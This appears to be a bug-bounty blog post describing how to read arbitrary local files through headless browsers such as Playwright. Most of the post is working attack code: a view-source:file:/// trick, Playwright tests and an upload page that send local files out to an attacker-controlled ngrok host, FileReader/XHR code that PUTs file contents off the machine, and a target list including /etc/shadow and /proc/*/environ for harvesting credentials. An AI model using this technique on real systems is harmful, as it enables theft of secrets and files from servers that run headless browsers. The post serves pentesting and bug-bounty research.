Arbitrary file read tricks with headless browsers

1 year ago 83
BOOK THIS SPACE FOR AD
ARTICLE AD

Last time we’ve set up a test environment to play around with Playwright. This time I would like to give a walkthrough of a few challenges when pushing arbitrary file reads (throughfile://) with headless browsers (screen empty for directory listing, file being downloaded instead of shown).

Although I’m using Playwright it is only one example, it could be Selenium, Puppeteer or any other framework to test apps with headless browsers.

I’m gonna give you a symptom and the solutions which I found (if you have any thoughts on how to improve, please don’t hold yourself back) considering two threat vectors:

an attacker being able to only control the page to be loadedan attacker being able to control the whole playwright test script (rare, but happens)

So in the previous post you’ve seen how a headless chromium (and actually chrome) is giving an empty screen for file:///. I have to admit that in the heat of a bugbounty I didn’t realize that this was not due to some sophisticated configuration / input validation and that it simply could be resolved by using view-source:file:/// .

Directory listing visible on Chromium with view-source

If input sanitization on the target app is messed up, this can work even when you only control the page to be loaded by playwright. And to be honest when input sanitization allows the file:/// protocol to be used, it most likely will allow view-source:file:/// as well ;)

So when I wanted to get a specific configuration file (let’s call it config.yml) on Chrome I bumped into an empty screenshot again (both directly attempting to access it and through view-source). Although I should’ve thought about it immediately I again needed a few extra local clicks in my browser to realize that Chrome (and for that matter Firefox neither) will not render yaml files by default but will “download” them when opened through file. OK, so what can we do?

If I only had control over the page loaded by playwright I couldn’t find a decent way to overcome this obstacle, however with control over the test specification I just got access to almost all the things a browser can do. Including opening a page with a file upload function.

Remote file upload

My first quick & dirty approach was to have a form with a filepicker served through ngrok & python, open that page, pick that config.yml with playwright’s help and submit the form.

The HTML is super simple:

<form method="post" enctype="multipart/form-data" target="/exfiltrate">
<div>
<label for="file">Choose file to upload</label>
<input type="file" id="file" name="file" class="filepicker" multiple />
</div>
<div>
<button id="bttn" class="bttn">Submit</button>
</div>
</form>

Let’s have something quickly to serve it (no, don’t put anything else into that folder and shut down things as soon as you don’t need them):

ngrok http 8000
python3 -m http.server 8000

And the Playwright test doing the actual file upload:

import { test, expect } from '@playwright/test';

let paths: string[] = ['/root/config.yaml']
# of course replace the below with your ngrok domain name
let NGROK_DOMAIN: string = 'https://edac-12-111-3-75.eu.ngrok.io'

test("arbitrary file read", async ({ page }) => {
for (var path of paths) {
await page.goto(NGROK_DOMAIN + '/js-fileread.html');
await page.locator('input[name="file"]').click();
await page.locator('input[name="file"]').setInputFiles(path);
await page.screenshot({ path: 'test-results/' + path.replace(/\//gi, "_") + '.png', fullPage: true });
await Promise.all([
page.waitForEvent('popup'),
page.locator('text=Submit').click()
]);
}
});

In this case the screenshot’s results are not too useful (one about the upload page and another one with a 501 error response as the python http.server right now doesn’t handle POST requests, but in ngrok’s web UI we can catch that the contents of the file indeed were sent to us:

Content`s of a local yaml file finally visible

Awesome, so now we should be able to “scrape” the local file system by extendingpaths in the playwright test specification. To get a general sense of the system I highly recommend gathering all the neat things mentioned in https://idafchev.github.io/enumeration/2018/03/05/linux_proc_enum.html (and more target specific files).

However there are some “files” that can’t be properly retrieved with this super simple html upload due to their content… for example trying to retrieve /proc/net/tcp will leave us with the following error message in the ngrok web UI:

The connection was closed before this request could be fully read; 0 bytes were captured. It cannot be replayed. The error encountered while reading the request body was “unexpected EOF”.

Using FileReader only

OK… do we really need that POST for every file? It is handy… especially when the other end is not just a stupid ngrok, but actually gathers the files nicely organized based on any additional metadata available. BUT we can also simply use FileReader to actually read the files as text and write them to the DOM (or send them off to ourselves to store & organize it nicely… but that might be a different post about scaling this whole thing up).

So let’s open stackoverflow for the rescue and have a different version for this approach (js-fileread.html):

<html>
<head>
<script>
window.onload = function(event) {
document.getElementById('fileInput').addEventListener('change', handleFileSelect, false);
}

function handleFileSelect(event) {
var fileReader = new FileReader();
fileReader.onload = function(event) {
document.write(event.target.result);
}
var file = event.target.files[0];
fileReader.readAsText(file);
}
</script>
</head>
<body>
<input type="file" name="file" id="fileInput">
</body>
</html>

And a minor tweak on the playwright test itself (no need to actually submit anything):

import { test, expect } from '@playwright/test';

let paths: string[] = ['/proc/net/tcp']
let NGROK_DOMAIN: string = 'https://edac-12-111-3-75.eu.ngrok.io'

test("arbitrary file read", async ({ page }) => {
for (var path of paths) {
await page.goto(NGROK_DOMAIN + '/js-fileread.html');
await page.locator('input[name="file"]').click();
await page.locator('input[name="file"]').setInputFiles(path);
await page.screenshot({ path: 'test-results/' + path.replace(/\//gi, "_") + '.png', fullPage: true });
}
});

And here comes /proc/net/tcp as well

As I said, I personally prefer to get that data not as screenshots so this is what I ended up with for handling the file select:

function handleFileSelect(event) {
var file = event.target.files[0];
var fileReader = new FileReader();
fileReader.onload = function(event) {
const xhr = new XMLHttpRequest();
xhr.open('PUT', '/file/' + file.name, true);
xhr.onload = () => {};
xhr.send(event.target.result);
}
fileReader.readAsBinaryString(file);
}

And I removed creating the screenshots from the test spec.

File name and content both nicely visible

Of course there are a ton of ways to further improve this whole thing:

let’s actually multiselect those files all at oncehave that backend writing the files to disk for investigation nicely with all the additional info (map the full path based on the filename / set extra info from playwright to have the full path by default)

OK, so now we have a decent way to retrieve multiple files reliably. What should you get by default?

I would go with something like this:

let paths: string[] = [
'/proc/net/arp', '/proc/net/route', '/proc/net/tcp', '/proc/self/cmdline',
'/proc/self/comm', '/proc/self/environ', '/proc/mounts',
'/proc/uptime', '/etc/fstab', '/etc/passwd', '/etc/shadow', '/etc/hosts',
'/etc/hostname', '/etc/resolv.conf'
]

And to do a bit of recon on the running processes (bruteforcing the first 100 pids, but ofc you could increase it way more…):

for (let pid = 0; pid < 100; pid++) {
paths.push('/proc/' + pid + '/cmdline')
paths.push('/proc/' + pid + '/environ')
}

And this would be really just the first step giving some ideas about the environment… I also would create a short Playwright test to gather the directory listing recursively on the whole disk (maybe next time?).

And then the most important part: understand the target by thoroughly analyzing the results and look for anything that might actually contain sensitive information (duh).

As you can see it is absolutely no rocket science to read files when you have a chance to play around with playwright / puppeteer but there are a few issues that need a bit of care and automating all the above can significantly increase your speed on pentests / bugbounties.

Read Entire Article